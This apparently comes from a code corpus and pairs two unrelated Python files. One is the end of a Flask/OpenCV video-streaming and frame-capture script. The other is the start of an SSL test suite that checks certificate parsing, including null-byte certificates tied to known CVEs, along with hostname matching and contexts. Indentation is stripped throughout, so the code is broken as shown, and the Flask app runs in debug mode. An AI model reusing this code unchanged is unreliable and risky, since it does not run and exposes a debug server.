#SENSOR FUSION Flask VIDEO API
#Brute Force Motion JPEG, OpenCV defaults to capture raw images,
#so we must encode it into JPEG in order to correctly display the
#video stream - NOTE need to work on this cv2.imencode tobytes slows the apparent frame rate by about 50%, plus the UI takes some
#See: https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/
ret, buffer = cv2.imencode('.jpg', frame)
frame2 = buffer.tobytes() #the image that is saved
#Capture Images and save to Annotate Named subdirectory under ~/Pictures
#capture_flag = os.environ.get('cap_flag')
annotate_name = os.environ.get('annotate_name')
if capture_flag == 'True':
#Check limit
try:
print("image limit: " + anno_images)
capture_image_limit = int(anno_images)
except:
pass
if capture_flag == 'True' and img_counter < capture_image_limit:
#Create new or use existing directory
path_to_directory = '../Pictures/' + annotate_name
print("Saving to ", path_to_directory)
try:
os.makedirs(path_to_directory)
except FileExistsError:
#dir already exists, so overwrite existing (unless we datestamp)!
pass
img_name="../Pictures/"+annotate_name+"/"+annotate_name+"sf-frame_{}.jpg".format(img_counter)
cv2.namedWindow("Capture Window")
cv2.moveWindow("Capture Window", -500, -500)# push it off screen :)
cv2.imwrite(img_name, frame1)
print('Wrote Image-'+ img_name)
img_counter +=1
#Clear Capture Flag when done grabbing images
if capture_flag == 'True' and img_counter >= capture_image_limit:
os.environ['cap_flag'] = 'False'
img_counter = 0
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame2 + b'\r\n') # concat frame one by one and show result
## End Video Stream API ###
# Calculate framerate
t2 = cv2.getTickCount()
time1 = (t2-t1)/freq
frame_rate_calc= 1/time1
# Press 'q' to quit
if cv2.waitKey(1) == ord('q'):
print("CV2 Break")
break
# Press 'q' to quit
quit_flag = os.environ.get('quit_flag')
if quit_flag == 'quit':#
os.environ['quit_flag'] = ''
print("CV2 Quit " + quit_flag)
cv2.destroyAllWindows()
if videostream:
#videostream.release()
videostream.stop()
print('Videostream stopped')
break
#print("quit_flag " + str(quit_flag))
# Clean up
cv2.destroyAllWindows()
if videostream:
#videostream.release()
videostream.stop()
#os.system("pkill chromium")
#webbrowser.open('http://localhost:5000', new=0)
except KeyboardInterrupt:
pass
######### run api #########
if __name__ == '__main__':
app.debug = True
app.run()
|
test_ssl.py
|
# -*- coding: utf-8 -*-
# Test the support for SSL and sockets
import sys
import unittest
from test import test_support as support
import asyncore
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib2
import traceback
import weakref
import platform
import functools
from contextlib import closing
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
def data_file(*name):
file = os.path.join(os.path.dirname(__file__), *name)
# Ensure we return unicode path. This tweak is not a divergence:
# CPython 2.7.13 fails the same way for a non-ascii location.
if isinstance(file, unicode):
return file
else:
return file.decode(sys.getfilesystemencoding())
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = CERTFILE.encode(sys.getfilesystemencoding())
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = ONLYCERT.encode(sys.getfilesystemencoding())
BYTES_ONLYKEY = ONLYKEY.encode(sys.getfilesystemencoding())
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = CAPATH.encode(sys.getfilesystemencoding())
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")
REMOTE_HOST = "self-signed.pythontest.net"
REMOTE_ROOT_CERT = data_file("selfsigned_pythontestdotnet.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
WRONGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = DHFILE.encode(sys.getfilesystemencoding())
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
class BasicTests(unittest.TestCase):
def test_sslwrap_simple(self):
# A crude test for the legacy API
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET))
except IOError, e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET)._sock)
except IOError, e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
@unittest.skipIf(support.is_jython, "Jython does not have _ssl, therefore this test needs to be rewritten")
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
@unittest.skipIf(support.is_jython, "Jython does not have _ssl, therefore this test needs to be rewritten")
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, (int, long))
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if "LibreSSL" in s:
self.assertTrue(s.startswith("LibreSSL {:d}.{:d}".format(major, minor)),
(s, t))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# socket.error raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
self.assertRaises(socket.error, ss.recv, 1)
self.assertRaises(socket.error, ss.recv_into, bytearray(b'x'))
self.assertRaises(socket.error, ss.recvfrom, 1)
self.assertRaises(socket.error, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(socket.error, ss.send, b'x')
self.assertRaises(socket.error, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with closing(ssl.wrap_socket(s)) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegexp(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegexp(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegexp(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
if support.get_java_version() < (9,):
# FIXME: Fails on Java 9+. See b.j.o. issue #2710. A similar issue is seen in
# test_load_cert_chain - apparently this RSA 1024 cert is too weak and gets a
# java.security.KeyStoreException: Key protection algorithm not found before the
# ValueError raised on earlier versions of Java;
# but we need to confirm this is truly the case on Java 9
with closing(ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE)) as s:
self.assertRaisesRegexp(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock, certfile=CERTFILE, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = u'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = u'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, u'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, u'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, u'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, u'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(socket.socket()) as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s, server_side=True, certfile=CERTFILE)) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
# TODO Jython better asn1 support, though not sure there's much use for it
# val = ssl._ASN1Object.fromnid(129)
# self.assertEqual(val, expected)
# self.assertIsInstance(val, ssl._ASN1Object)
# self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
# with self.assertRaisesRegexp(ValueError, "unknown NID 100000"):
# ssl._ASN1Object.fromnid(100000)
# for i in range(1000):
# try:
# obj = ssl._ASN1Object.fromnid(i)
# except ValueError:
# pass
# else:
# self.assertIsInstance(obj.nid, int)
# self.assertIsInstance(obj.shortname, str)
# self.assertIsInstance(obj.longname, str)
# self.assertIsInstance(obj.oid, (str, type(None)))
#
# val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
# self.assertEqual(val, expected)
# self.assertIsInstance(val, ssl._ASN1Object)
# self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
# self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
# expected)
# with self.assertRaisesRegexp(ValueError, "unknown object 'serverauth'"):
# ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatement for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
self.assertRaises(TypeError, ssl.SSLContext)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
@unittest.skipIf(support.is_jython, "Currently not supported")
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1,
ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options = 0
self.assertEqual(0, ctx.options)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
